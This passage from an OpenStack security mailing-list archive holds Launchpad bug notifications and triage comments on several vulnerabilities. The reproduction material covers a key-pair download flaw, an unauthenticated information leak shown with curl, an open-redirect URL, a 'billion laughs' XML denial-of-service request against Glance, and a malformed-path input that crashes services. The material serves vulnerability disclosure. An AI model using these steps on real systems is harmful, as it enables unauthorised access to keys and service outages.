images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 (cherry picked from commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f) From tdecacqu at redhat.com Tue Sep 27 14:39:21 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 14:39:21 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927143922.23570.7206.launchpad@soybean.canonical.com> ** Information type changed from Private Security to Public ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers.
Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - - -- - Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 14:52:24 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 14:52:24 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927145224.23486.23401.malone@gac.canonical.com> Oops, wrong bug updated. Well now that this is public, I've added keystone to check that bug. ** Also affects: keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. 
Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 15:16:29 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 15:16:29 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927151629.24708.37086.malone@soybean.canonical.com> It seems like the download link does in fact create the key first, so another user will download another (newly generated) key. Can someone please confirm before we close this bug. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 15:19:45 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 15:19:45 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927151946.24102.92745.malone@gac.canonical.com> This seems like it requires some sort of UUID guessing, thus I suggest a class D according to the VMT taxonomy ( https://security.openstack.org /vmt-process.html#incident-report-taxonomy ). ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From fungi at yuggoth.org Tue Sep 27 15:33:06 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 15:33:06 -0000 Subject: [Openstack-security] [Bug 1625833] Re: Prevent open redirects as a result of workflow action References: <20160920214728.9448.43144.malonedeb@chaenomeles.canonical.com> Message-ID: <20160927153308.27730.73150.launchpad@chaenomeles.canonical.com> ** Changed in: horizon Status: New => In Progress ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625833 Title: Prevent open redirects as a result of workflow action Status in OpenStack Dashboard (Horizon): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: For example: /admin/flavors/create/?next=http://www.foobar.com/ If a user is tricked into clicking that link, the flavor create workflow will be shown, but the redirect on form post will unexpectedly take the user to another site. Prevent this by checking that the next_url in WorkflowView.post is same origin. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625833/+subscriptions From fungi at yuggoth.org Tue Sep 27 15:36:41 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 15:36:41 -0000 Subject: [Openstack-security] [Bug 1618879] Re: iptables rule always be thrashed when update a little rule References: <20160831130211.12061.23842.malonedeb@chaenomeles.canonical.com> Message-ID: <20160927153641.23919.50200.malone@gac.canonical.com> I agree with Tristan, this looks like a security hardening opportunity. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1618879 Title: iptables rule always be thrashed when update a little rule Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: When update meter label or rule, iptables_manager will update iptables rule in router's namespace. In order to, it will clean traffic counter number collected in interval time, the other iptables always trashing that will clean old iptalbes rule and generate new same significance iptables rule. 
the example from update meter label: Generated by iptables_manager *filter :neutron-meter-neutron-met - [0:0] :neutron-meter-r-00599199-632 - [0:0] -I FORWARD 2 -j neutron-meter-FORWARD -D FORWARD 4 -I INPUT 1 -j neutron-meter-INPUT -D INPUT 3 -I OUTPUT 2 -j neutron-meter-OUTPUT -D OUTPUT 4 -I neutron-filter-top 1 -j neutron-meter-local -D neutron-filter-top 3 -D neutron-meter-l-00e4e019-099 1 -I neutron-meter-l-00e4e019-099 1 -D neutron-meter-l-01e4e019-099 1 -I neutron-meter-l-01e4e019-099 1 -I neutron-meter-r-00599199-632 1 -i qg-f0732f6f-8e -d 192.168.10.0/24 -j neutron-meter-l-00599199-632 COMMIT # Completed by iptables_manager # Generated by iptables_manager *raw -I OUTPUT 1 -j neutron-meter-OUTPUT -D OUTPUT 3 -I PREROUTING 1 -j neutron-meter-PREROUTING -D PREROUTING 3 COMMIT # Completed by iptables_manager To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1618879/+subscriptions From 1625619 at bugs.launchpad.net Tue Sep 27 15:50:40 2016 From: 1625619 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 15:50:40 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927155040.22900.34637.launchpad@gac.canonical.com> ** Also affects: nova Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 16:07:16 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 16:07:16 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927160718.24229.20780.launchpad@soybean.canonical.com> ** Information type changed from Public to Public Security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 16:10:02 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 16:10:02 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927161002.24066.97747.malone@soybean.canonical.com> I agree this seems like class D (security hardening), though if the case is made that there is a legitimate vulnerability here then the need to guess UUIDs to exploit it would make it class C1 instead. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1625619 at bugs.launchpad.net Tue Sep 27 16:21:40 2016 From: 1625619 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 16:21:40 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927162140.24598.48366.malone@soybean.canonical.com> Adding nova to the bug report since keypairs are a nova concept. 
Not sure what we can do from a keystone perspective; it looks like there is policy in place to protect the keypair: https://github.com/openstack/nova/blob/6501f05af761ee205a555accfd598f0cb6305c8b/nova/policies/keypairs.py#L38-L40 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 18:50:29 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 18:50:29 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160927185029.23535.45964.malone@soybean.canonical.com> Agreed on the already public nature of this, I've switched the status accordingly. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). 
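The report below recommends replacing xml.etree with a hardened parser such as defusedxml; a minimal sketch of what that swap looks like (the function name is illustrative, not the actual ovf_process.py code):

    import defusedxml.ElementTree as ET

    def iter_ovf_tags(ovf_file):
        # defusedxml rejects XML entity declarations, so a "billion laughs"
        # payload raises an EntitiesForbidden error instead of expanding
        # into gigabytes of memory.
        for event, element in ET.iterparse(ovf_file):
            yield element.tag

Whatever the project ultimately decides, the point is that a defensive parser refuses entity expansion up front rather than trying to materialise it.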
No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 
Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Tue Sep 27 18:47:59 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 18:47:59 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927184801.23622.51203.launchpad@gac.canonical.com> ** Changed in: ossa Status: Incomplete => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. 
Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1621626 at bugs.launchpad.net Tue Sep 27 20:40:19 2016 From: 1621626 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 20:40:19 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927204019.23707.12095.malone@gac.canonical.com> This is fixed in master (as stated in the bug report), we could backport the fix to Mitaka as it's a security issue, albeit a minor one. I'm OK with backporting the fix, but I'm also OK with not backporting it (IIRC there were one or two other patches that needed to land after https://review.openstack.org/#/c/339356/ merged). I agree with the class D assessment. ** Also affects: keystone/mitaka Importance: Undecided Status: New ** Changed in: keystone Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) mitaka series: New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1621626 at bugs.launchpad.net Tue Sep 27 20:41:18 2016 From: 1621626 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 20:41:18 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927204118.17392.35955.malone@wampee.canonical.com> Added the mitaka series since it's fixed in master -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) mitaka series: New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. 
$ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From charles.neill at rackspace.com Wed Sep 28 00:22:27 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 00:22:27 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations in Keystone v3 References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928002227.27619.20497.malone@chaenomeles.canonical.com> This affects a number of other OpenStack projects in a similar way, including: - Neutron - Cinder - Glance More projects may be affected that we are unaware of. ===================================================== Example traceback from Neutron ===================================================== 2016-09-28 00:16:43.342 1218 DEBUG neutron.wsgi [-] (1218) accepted ('10.0.2.2', 50029) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868 Traceback (most recent call last): File "/usr/lib/python2.7/logging/__init__.py", line 851, in emit msg = self.format(record) File "/usr/local/lib/python2.7/dist-packages/oslo_log/handlers.py", line 76, in format return logging.StreamHandler.format(self, record) File "/usr/lib/python2.7/logging/__init__.py", line 724, in format return fmt.format(record) File "/usr/local/lib/python2.7/dist-packages/oslo_log/formatters.py", line 297, in format return logging.Formatter.format(self, record) File "/usr/lib/python2.7/logging/__init__.py", line 464, in format record.message = record.getMessage() File "/usr/lib/python2.7/logging/__init__.py", line 328, in getMessage msg = msg % self.args File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1164, in as_text bytes = self.as_bytes() File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1135, in as_bytes url = self.url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url url = self.path_url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url bpath_info = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 11: invalid start byte Logged from file catch_errors.py, line 41 2016-09-28 00:16:43.489 1218 INFO neutron.wsgi [req-37cfe540-c134-4ec0-91d2-56687f38ffd5 admin -] 10.0.2.2 - - [28/Sep/2016 00:16:43] "PUT /v2.0/flavors/..%c0%af HTTP/1.1" 500 414 0.140984 ===================================================== Example traceback from Cinder 
===================================================== 2016-09-27 23:50:00.142 5986 DEBUG eventlet.wsgi.server [-] (5986) accepted ('10.0.2.2', 49862) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868 2016-09-27 23:50:00.198 ERROR cinder.api.middleware.fault [req-7ec3610c-9cdc-4f7d-b69c-36c385d0fa10 admin] Caught error: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault Traceback (most recent call last): 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 79, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return req.get_response(self.application) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault application, catch_exc_info=False) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault app_iter = application(self.environ, start_response) 2016-09-27 23:50:00.198 5986 